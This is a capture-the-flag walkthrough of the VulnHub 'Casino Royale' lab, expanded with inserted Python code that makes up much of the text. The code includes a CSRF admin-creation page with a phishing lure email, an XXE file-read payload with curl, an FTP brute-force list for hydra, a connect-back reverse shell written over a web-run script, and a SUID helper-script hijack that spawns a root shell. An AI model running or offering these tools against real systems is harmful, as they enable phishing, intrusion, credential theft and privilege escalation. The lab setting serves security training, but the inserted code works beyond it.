Casino Royale: 1

[ vulnhub  ctf  walkthrough  ]

Goal

root

Download

https://www.vulnhub.com/entry/casino-royale-1,287/

Walkthrough

nmap scan of the target

default page on port 80

default page on port 8081

nothing happens after the POST

dirb shows some interesting directories

cards… nothing

kboard… nothing

robots.txt lists cards and kboard… lol

trying index.php reveals a PokerMax install

we find an admin page, but the default credentials don't work

we move on to sqlmap

sqlmap succeeds and we recover the admin password

logged in to the PokerMax admin

looking around, user valenka has some info in the profile

add the hostname to /etc/hosts and browse to the URL: it's a CMS

going through the posts, this one looks interesting given that port 25 is open

a quick search on exploit-db turns up a CSRF attack that looks like it could work: https://www.exploit-db.com/exploits/35301

set up the CSRF file and host it on the attacking machine with apache

setting up the email took some time: figuring out the correct subject line meant going one by one through the poker clients

final send: an email with a link to the CSRF file

the apache access log shows the file was fetched!

attempt to sign in with the creds set in the CSRF file

success! in as admin
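As an added example (not part of the original post, and not the exploit from the exploit-db entry), here is the shape of the two pieces used above: a page that auto-submits the add-admin form when the victim opens it, and the lure email that points at it. The CMS endpoint, field names, hostnames, addresses, subject and listener IP are all assumptions; substitute the real ones from the advisory and the box.

```python
import html
import smtplib
from email.message import EmailMessage

# Assumptions, not values from the original post or the advisory: the CMS's
# add-user endpoint and its form field names.
ADD_ADMIN_URL = "http://casino-royale.local/admin/add_user"
ADMIN_FIELDS = {
    "username": "agent007",
    "password": "Sup3rS3cret!",
    "password2": "Sup3rS3cret!",
    "role": "admin",
}


def csrf_page(action_url, fields):
    """Return an HTML page that auto-POSTs `fields` to `action_url`.

    The form submits from the body's onload handler, so a logged-in admin who
    just opens the link sends the state-changing request with their own
    session cookie. Every value is HTML-escaped so a quote in a password
    cannot break out of the attribute and ruin the form.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<!DOCTYPE html>\n<html>\n"
        '<body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{html.escape(action_url, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n</body>\n</html>\n"
    )


def lure_email(sender, recipient, subject, link):
    """Build the lure that gets the victim to open the hosted CSRF page."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(
        "Hi,\n\nThe updated table schedule is posted here:\n"
        f"{link}\n\nThanks\n"
    )
    return msg


def send_lure(msg, smtp_host, smtp_port=25):
    """Deliver the lure through the target's open SMTP service on port 25."""
    with smtplib.SMTP(smtp_host, smtp_port, timeout=10) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    # Write the page into apache's docroot on the attacking box, then send.
    with open("csrf.html", "w", encoding="utf-8") as fh:
        fh.write(csrf_page(ADD_ADMIN_URL, ADMIN_FIELDS))
    # Assumed addresses, hostname and subject; the post notes the subject the
    # target reacts to had to be found by trying the poker client names.
    msg = lure_email("support@casino-royale.local", "admin@casino-royale.local",
                     "Poker client update", "http://10.0.0.5/csrf.html")
    send_lure(msg, "casino-royale.local")
```

Watching the apache access log for the GET of csrf.html, as the post does, is the confirmation that the victim opened the link; whether the form actually created the account only shows up when you try the new credentials.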

wasted a lot of time looking for places to add PHP code; it turns out the details were in a user profile again

browsing to the new URL, it's a directory listing

browsing to main.php, nothing special

but we find interesting notes in the source

looks like an XXE vulnerability, and here is a good post to follow: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

set up xml.txt and the curl command

running it reveals /etc/passwd

now we have usernames, we know FTP is open, and the comment in the ultra source says it's an easy password. throw hydra at it… success
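An added example (mine, not the author's files) covering the XXE and hydra steps above: the payload that goes in xml.txt, the curl call that posts it, and a parser that turns the leaked /etc/passwd into a user list for hydra, skipping the daemon accounts that can't log in anyway. The element name main.php reads, the target URL and the sample passwd contents are assumptions/constructed; the post only shows them as screenshots.

```python
import re

# Assumed element name that main.php parses out of the XML body.
XML_FIELD = "email"

# Constructed sample of what came back, standing in for the real /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
ftp:x:114:122:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:115:124:MySQL Server,,,:/nonexistent:/bin/false
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/sh
"""


def xxe_payload(target_file, root_tag="creds", field=XML_FIELD):
    """XML document whose external entity expands to `target_file`.

    A parser with external entities enabled substitutes &xxe; with the file
    while building the document; when the app echoes the field back (as
    main.php does here), the file contents land in the HTTP response.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE {root_tag} [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_file}">\n'
        "]>\n"
        f"<{root_tag}><{field}>&xxe;</{field}></{root_tag}>\n"
    )


def curl_command(url, payload_path="xml.txt"):
    """argv for the curl call (kept as a list so nothing needs shell quoting)."""
    return ["curl", "-s", "-X", "POST", url,
            "-H", "Content-Type: application/xml",
            "--data-binary", f"@{payload_path}"]


def passwd_users(passwd_text, min_uid=1000, include_root=True):
    """Login names worth brute-forcing, pulled from leaked /etc/passwd text.

    Skips the daemon accounts (nologin / false shells, low UIDs) so hydra's
    attempts go to accounts that can actually log in. Lines that are not
    seven colon-separated fields (HTML the page wrapped around the leak,
    blank lines) are ignored.
    """
    users = []
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if shell.endswith(("nologin", "false")):
            continue
        if uid >= min_uid or (include_root and uid == 0):
            users.append(name)
    return users


def hydra_command(users_file, passwords_file, target):
    """hydra invocation against the FTP service with the harvested user list."""
    return ["hydra", "-L", users_file, "-P", passwords_file, f"ftp://{target}"]


if __name__ == "__main__":
    with open("xml.txt", "w") as fh:
        fh.write(xxe_payload("/etc/passwd"))
    print(" ".join(curl_command("http://TARGET/path/to/main.php")))  # assumed URL
    with open("users.txt", "w") as fh:
        fh.write("\n".join(passwd_users(SAMPLE_PASSWD)) + "\n")
    print(" ".join(hydra_command("users.txt", "passwords.txt", "TARGET")))
```

The same payload with a different `target_file` is how you read the PHP sources later if needed; swapping `file://` for `php://filter/convert.base64-encode/resource=...` gets around files that are not well-formed XML, which is a trick the linked depthsecurity post also covers.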

FTP access works, however we cannot do much: uploads fail, but we can make directories

after some playing around, we can upload, just not with an extension :)

we cannot upload with a .php extension, but .php5 works. the upload filter only blocks .php, while the web server still hands .php5 to the PHP handler, so the blacklist is bypassed

we set up our netcat listener and browse to the file, but nothing happens. looking closer, the web server cannot read the uploaded file as is, so we need to add permissions; we just chmod 777 it

we revisit the file in the browser and get a reverse shell

quickly find valenka's MySQL password

able to elevate to user valenka after breaking out of the jail. after much searching, that elevation didn't help though

back as www-data, searched and found an interesting SUID file and directory

running the SUID file, it seems to pull network stats and processes, most likely via run.sh

from here we need to become user le, so we look at some of the files served by the web server. index.html calls collect.php

collect.php calls a python script, and that script is writable by www-data. it currently reads a log file, but we can replace it with a reverse shell

we know we can reach these files via port 8081. looking more closely, the web server on that port runs as user le

first, create the new python script containing our reverse shell

next we download the file to /tmp

then overwrite the existing python script with its contents and cat it to verify

set up a netcat listener on the new port, browse the site to trigger the python script… and we have a reverse shell as user le!!
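An added example (not the author's script) of the replace-the-python-script step just described: it renders a connect-back shell for the listener and writes it over the target script while keeping the file's permission bits, so the web wrapper keeps invoking it the same way. The script name, listener address and the original script's contents are assumptions/constructed; `demo()` runs the whole thing against a temp copy so it can be checked without the box.

```python
import os
import shutil
import stat
import tempfile

# Connect-back script that replaces the log reader. Listener host/port are
# filled in by build_reverse_shell(); the values used in demo() are assumptions.
SHELL_TEMPLATE = """\
#!/usr/bin/env python
# reverse shell: connect back to {lhost}:{lport}, point stdin/stdout/stderr at
# the socket and hand over to an interactive shell.
import os, socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("{lhost}", {lport}))
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])
"""


def build_reverse_shell(lhost, lport):
    """Render the connect-back script for the given listener."""
    lport = int(lport)
    if not 0 < lport < 65536:
        raise ValueError("listener port out of range")
    return SHELL_TEMPLATE.format(lhost=lhost, lport=lport)


def overwrite_script(target, new_source, keep_backup=True):
    """Replace `target` in place, keeping its permission bits (and a .bak copy).

    Equivalent to the post's `echo`-over-the-file step, with two checks the
    shell one-liner skips: the new source must at least compile, and the mode
    is preserved so the web wrapper keeps running the script the same way.
    Returns the final mode bits.
    """
    mode = stat.S_IMODE(os.stat(target).st_mode)
    compile(new_source, target, "exec")      # bail before clobbering on a typo
    if keep_backup:
        shutil.copy2(target, target + ".bak")
    with open(target, "w") as fh:
        fh.write(new_source)
    os.chmod(target, mode)
    return stat.S_IMODE(os.stat(target).st_mode)


def demo(lhost="10.0.0.5", lport=4444):
    """Constructed stand-in for the real target: a writable script in a temp
    dir, overwritten and verified the same way as on the box."""
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "collect.py")       # hypothetical name
    with open(target, "w") as fh:
        fh.write("print(open('/var/log/app.log').read())\n")
    os.chmod(target, 0o755)
    payload = build_reverse_shell(lhost, lport)
    mode = overwrite_script(target, payload)
    with open(target) as fh:
        installed = fh.read()
    result = {"mode": mode, "replaced": installed == payload,
              "backup": os.path.exists(target + ".bak"),
              "connects_to": f"{lhost}:{lport}"}
    shutil.rmtree(workdir)
    return result


if __name__ == "__main__":
    print(demo())
    # On the box: point overwrite_script() at the real script instead, start
    # the listener first (nc -lvnp 4444), then browse to the 8081 page.
```

Start the listener before triggering the page; the 8081 server runs the script as user le, which is why the shell that connects back is le's rather than www-data's.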

now back to run.sh: it's just netstat and ps commands

we own the file, so chmod it writable and append a /bin/sh

with that, run mi6… and we're root
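The SUID step above, as an added example (mine, not from the post) of the general pattern: find root-owned setuid binaries, pull the helper script paths out of their strings, and if we own such a script, make it writable and append a shell spawn. `demo()` builds a fake binary and a read-only run.sh in a temp dir (constructed here) so the logic can be exercised off the box; paths and contents are not the real mi6's.

```python
import os
import re
import stat
import tempfile

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")


def is_suid_root(st_mode, st_uid):
    """True for a root-owned file with the setuid bit (what `find / -perm -4000
    -user root` lists); such a binary runs with euid 0 for whoever executes it."""
    return bool(st_mode & stat.S_ISUID) and st_uid == 0


def find_suid_root(root="/"):
    """Walk `root` and yield root-owned setuid regular files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_suid_root(st.st_mode, st.st_uid):
                yield path


def referenced_scripts(binary_bytes):
    """Absolute *.sh paths embedded as strings in a binary (what
    `strings mi6 | grep '\\.sh'` shows): the helpers it most likely execs."""
    hits = []
    for s in PRINTABLE.findall(binary_bytes):
        for tok in s.split():
            if tok.startswith(b"/") and tok.endswith(b".sh") and tok not in hits:
                hits.append(tok)
    return [h.decode() for h in hits]


def hijack_script(script_path, line="/bin/sh"):
    """Make the helper script writable if we own it, append a shell spawn, and
    return the new last line. Run by the SUID binary, that line comes up as
    root. (/bin/sh as dash keeps the effective uid; bash would need -p.)"""
    st = os.stat(script_path)
    if st.st_uid != os.getuid():
        raise PermissionError(f"{script_path} is not ours to modify")
    if not st.st_mode & stat.S_IWUSR:
        os.chmod(script_path, stat.S_IMODE(st.st_mode) | stat.S_IWUSR)
    with open(script_path, "a") as fh:
        fh.write(line + "\n")
    with open(script_path) as fh:
        return fh.read().splitlines()[-1]


def demo():
    """Constructed stand-ins for mi6 and run.sh: a fake binary with the helper
    path in its strings, and a read-only script we own."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "run.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\nnetstat -tulpn\nps aux\n")
    os.chmod(script, 0o555)                       # not writable, but ours
    fake_binary = b"\x7fELF\x00\x00/bin/sh -c " + script.encode() + b"\x00exit\x00"
    refs = referenced_scripts(fake_binary)
    last = hijack_script(refs[0])
    return {"refs": refs, "last_line": last,
            "mode": stat.S_IMODE(os.stat(script).st_mode),
            "suid_example": is_suid_root(0o104755, 0)}


if __name__ == "__main__":
    print(demo())
    # On the box: list(find_suid_root("/")), read the binary, run
    # referenced_scripts() on it, hijack the one we own, then execute mi6.
```

The defensive read of the same check is the one to remember: a setuid binary is only as safe as every file it executes, and a helper script owned by a non-root user turns the binary into a root shell for that user.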

in /root/flag there is a script flag.sh, which when run tells us to open a URL

nice

Written on February 26, 2019